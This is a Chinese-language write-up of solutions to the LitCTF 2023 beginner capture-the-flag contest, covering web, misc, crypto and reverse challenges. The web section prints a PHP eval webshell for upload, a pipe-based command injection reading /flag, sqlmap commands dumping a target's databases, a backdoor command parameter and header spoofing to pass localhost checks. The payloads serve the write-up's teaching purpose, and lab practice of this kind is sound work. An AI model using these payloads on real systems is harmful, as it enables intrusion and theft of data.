第一届LitCTF-2023web部分wp

简单题一并拿下,难题一律不会www
总的来说难度是低的,不亏是新生赛,对于我这个小白来说可太有体验感了
是我太笨逼了,没有AK掉web,赛后看wp肠子都悔了55555
以此表扬(xxxx

WEB

▸ 我Flag呢?

源代码搜索flag

▸ 导弹迷踪

游戏题

/src/game.js 文件找到flag

image-20230513130612563

▸ Follow me and hack me

根据提示

image-20230513125818991

get和post传参即可

payload
GET:CTF=Lit2023
POST:Challenge=i'm_c0m1ng

▸ Ping

尝试|| &&绕过

发现有前端ip检测

 function check_ip(){
    let ip = document.getElementById('command').value;
    let re = /^(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)$/;

    if(re.test(ip.trim())){
      return true;
    }
    alert('敢于尝试已经是很厉害了,如果是这样的话,就只能输入ip哦');
    return false;
  }

尝试修改前端代码尝试绕过,发现无效(可能是我菜

这时候就已经没思路了,百度搜索小知识发现可以在控制台覆盖原始函数的方法

check_ip = function() {
    return true;
};

尝试 123|ls

image-20230513125429555

可以看出有回显,说明成功绕过了

payload
123|cat /flag

得到flag

▸ PHP是世界上最好的语言!!

直接输入指令查看即可

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传在这里插入图片描述

▸ 作业管理系统

源代码藏有默认密码admin\admin

看到上传文件,尝试上传个一句话木马

<?php eval($_POST['K1nako']);?>

尝试访问,发现有回显值,上传成功了(蚁剑连接同理,(懒得开蚁剑ximage-20230513135226825

payload
K1nako=system('cat /flag');

得到flag

▸ Vim yyds

根据题目提示:漏…漏了!

盲猜一个swp临时文件泄露

利用目录扫描工具一扫果然如此

image-20230513140923005

将swp文件下载下来拖到linux系统里输入指令vim -r index.php.swp

就可修复文件

image-20230513140948186

可以看到,里面藏了后门代码,通过post方式传参 password,这就好办了

Give_Me_Your_Flag base64加密然后传参得到回显

image-20230513141219344

payload
POST:password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag

得到flag

▸ 这是什么?SQL !注一下 !

打开是一个搜索框,根据题目考点是sql

直接sqlmap跑起来

sqlmap -u "http://node5.anna.nssctf.cn:28399/?id=id%3D1" --dbs 跑数据库

image-20230513145426869

sqlmap -u "http://node5.anna.nssctf.cn:28399/?id=id%3D1" -D ctf --tables 爆数据库表名

image-20230513145539331

sqlmap -u "http://node5.anna.nssctf.cn:28399/?id=id%3D1" -D ctf -T users --columns 爆数据库表字段

image-20230513150150040

sqlmap -u "http://node5.anna.nssctf.cn:28399/?id=id%3D1" -D ctf -T users -C password --dump 爆字段内容,发现了flag…的第四部分????(补充,这是彩蛋

image-20230513150734527

换个数据库接着跑,就算是四个部分也得跑出来hhh

不出所料在ctftraining/flag/flag 爆出了真正的flag

image-20230513152632184

payload
sqlmap -u "http://node5.anna.nssctf.cn:28399/?id=id%3D1" -D ctftraining -T flag -C flag --dump

▸ Http pro max plus

打开只允许本地访问

利用xff,突然被骂(x

image-20230513153818472

那就换个伪造 client-ip:127.0.0.1 然后回显了奇怪的东西

image-20230513160719587

Referer:pornhub.com

image-20230513160827138

Via:Clash.win

终于在我的不懈努力,百度翻了又翻,试了又试,给我试出来了

image-20230513163534434

我替你们点了一下,都不是什么好东西(x

image-20230513163930091

看了一眼源代码才发现hint藏在这里面

<!--你就冲吧,什么都冲只会害了你自己 bdy好康的在 /sejishikong.php-->

访问 //sejishikong.php 得到flag

▸ 彩蛋

我是没想到,前面找到的分部flag居然是彩蛋www

我Flag呢 flag藏在 assets/js/script.min.js 第一个彩蛋 LitCTF{First_t0_The_k3y!

作业管理系统 远程登陆下面有个连接,浏览器打开即可 第二个彩蛋 _S0_ne3t?

Follow me and hack me 备份文件 www.zip 第三个彩蛋 _R3ady_Pl4yer_000ne_

这是什么?SQL !注一下 ! ctf/users/password 第四个彩蛋 F1rst_to_Th3_eggggggggg!}

MISC

▸ 签到!(初级)

关注公众号。签到

▸ What_1s_BASE (初级)

base64解码即可

▸ Take me hand (初级)

Wireshark 打开

全都是 ssh 协议,过滤器填入 ssh 过滤一下

右键第一个 ssh 协议跟踪TCP流查看

在流1 找到flag

image-20230513185625163

▸ 404notfound (初级)

下载附件,010editor打开,发现flag

▸ 喜欢我的压缩包么 (初级)

下载附件,根据题目提示,密码六位数,爆破得到密码

image-20230513190107133

解压得到flag

▸ 这羽毛球怎么只有一半啊(恼 (初级)

下载附件,根据题目提示,将图片拖进010editor

修改高度,查看图片即可得到flagimage-20230513190610080

▸ 破损的图片(初级)

下载附件发现没有后缀名,拖进010editor查看文件头被删掉了,文件尾AE426082,确定为PNG文件

image-20230513191308312

修改完后查看图片即可得到flag

Crypto

▸ Hex?Hex!(初级)

hex解码

▸ 梦想是红色的 (初级)

核心价值观编码

▸ 原来你也玩原神 (初级)

呃呃,抽象编码

原神提瓦特文字
(看的眼花x
在这里插入图片描述

▸ 家人们!谁懂啊,RSA签到都不会 (初级)

image-20230513195748358

总之就是我也不会,工具梭出来的hhh

▸ Is this only base?

SWZxWl=F=DQef0hlEiSUIVh9ESCcMFS9NF2NXFzM
今年是本世纪的第23年呢

栅栏密码23栏,base64解码,凯撒密码23行

▸ 你是我的关键词(Keyworld) (初级)

IFRURC{X0S_YP3_JX_HBXV0PA}

根据题目提示 YOU are my keyworld

应该是关键词密码(Keywordd Cipher)

提示中的YOU是大写盲猜是密钥,解密得出flag

image-20230514113119337

Reverse

签到题怎么不算题捏~

▸ 世界上最棒的程序员

IDA打开搜索文本flag关键词即可wwwww

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值